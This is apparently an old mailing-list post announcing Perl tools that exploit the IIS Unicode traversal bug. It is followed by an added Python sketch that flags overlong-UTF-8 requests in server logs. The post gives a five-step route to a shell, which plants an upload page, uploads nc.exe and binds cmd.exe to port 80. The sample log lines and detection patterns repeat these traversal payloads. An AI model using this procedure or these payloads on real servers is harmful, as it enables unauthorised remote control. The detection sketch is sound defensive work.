(assumes an IIS server vulnerable to the Unicode bug)
Tarball contains two PERL scripts:
1. Unicode upload creator (unicodeloader.pl)
Works like this - two files (upload.asp and upload.inc - have
them in the same dir as the PERL script) are built in the webroot
(or anywhere else) using echo and some conversion strings.
These files allow you to upload any file by
simply surfing with a browser to the server.
Typical use: (5 easy steps to a shell)
   1. Find the webroot (duh)
   2. perl unicodeloader target:80 'webroot'
   3. surf to target/upload.asp and upload nc.exe
   4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
   5. telnet target 80
Above procedure will drop you into a shell on the box
without crashing the server (*winks at Eeye*).
This procedure is nice for servers that are very tightly
firewalled; servers that are not allowed to FTP, RCP or TFTP
to the Internet.
2. Unicodexecute version3 (unicodexecute3.pl)
same as before plus
-includes searches for alternative executable dirs
-more robust, stable than before
-checks for access denied etc. added
Regards,
Roelof.
------------------------------------------------------
Roelof W Temmingh SensePost IT security
[EMAIL PROTECTED] +27 83 448 6996
http://www.sensepost.com
unitools.tgz
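
Added example, not part of the original post or the SensePost tools: a log triage sketch for the request pattern the procedure above leaves behind. It assumes the "Unicode bug" means IIS accepting overlong (non-shortest-form) UTF-8 encodings of path separators, and that request URIs are logged with their percent-escapes intact; the sample lines and their paths are constructed placeholders.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample requests ("METHOD URI"); not real traffic, paths are placeholders.
SAMPLE_LOG = [
    "GET /default.asp",
    "GET /scripts/..%c0%af../dir/cmd.exe?/c+echo+x",
    "POST /upload.asp",
    "GET /scripts/..%e0%80%af../dir/nc.exe?-l+-p+80+-e+cmd.exe",
    "GET /images/caf%c3%a9.gif",  # valid 2-byte UTF-8, must not alert
]

# Byte patterns that can only occur in overlong (non-shortest-form) UTF-8.
OVERLONG = re.compile(
    rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]|\xf0[\x80-\x8f][\x80-\xbf]{2}"
)
# File names taken from the post above.
ARTIFACTS = re.compile(r"\b(?:cmd\.exe|upload\.(?:asp|inc)|nc\.exe)", re.I)

def decode_overlong(seq: bytes) -> str:
    """Return the character an overlong sequence would decode to in a lax decoder."""
    cp = seq[0] & (0xFF >> (len(seq) + 1))   # payload bits of the lead byte
    for b in seq[1:]:
        cp = (cp << 6) | (b & 0x3F)          # six payload bits per continuation byte
    return chr(cp)

def inspect(uri: str):
    """Return (characters hidden by overlong encoding, artifact names seen)."""
    raw = unquote_to_bytes(uri)
    hidden = [decode_overlong(m.group()) for m in OVERLONG.finditer(raw)]
    names = [m.group().lower() for m in ARTIFACTS.finditer(raw.decode("latin-1"))]
    return hidden, names

def triage(lines):
    """Flag lines: 'high' if an overlong sequence is present, else 'review'."""
    flagged = []
    for line in lines:
        method, uri = line.split(" ", 1)
        hidden, names = inspect(uri)
        if hidden or names:
            severity = "high" if hidden else "review"
            flagged.append((severity, method, uri, hidden, names))
    return flagged

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
```

Overlong sequences are never valid UTF-8, so the "high" rule can be enforced as a hard reject at a proxy or filter in front of the server; the file-name matches are context for an analyst, not proof on their own.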